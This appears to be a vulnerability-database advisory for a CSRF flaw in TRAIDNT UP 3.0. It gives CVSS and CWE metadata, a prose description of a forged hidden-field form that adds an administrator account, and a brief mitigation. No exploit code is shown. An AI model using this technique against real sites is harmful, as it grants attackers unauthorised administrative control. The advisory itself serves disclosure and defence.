vendor: TRAIDNT UP
by: P0C T34M
CVSS: 8.8 HIGH
CWE-352: Cross-Site Request Forgery (CSRF)
Product Name: TRAIDNT UP
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:traidnt:traidnt_up:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
TRAIDNT UP Version 3.0 – CSRF Add Admin
This exploit allows an attacker to add an admin user to TRAIDNT UP Version 3.0 by sending a maliciously crafted request to the vulnerable application. The request is built as a form whose hidden fields contain the details of the admin user to be added. When the form is submitted, the application adds the user to the system without any authentication.
Mitigation:
Implementing a CSRF token in the application can help prevent this type of attack.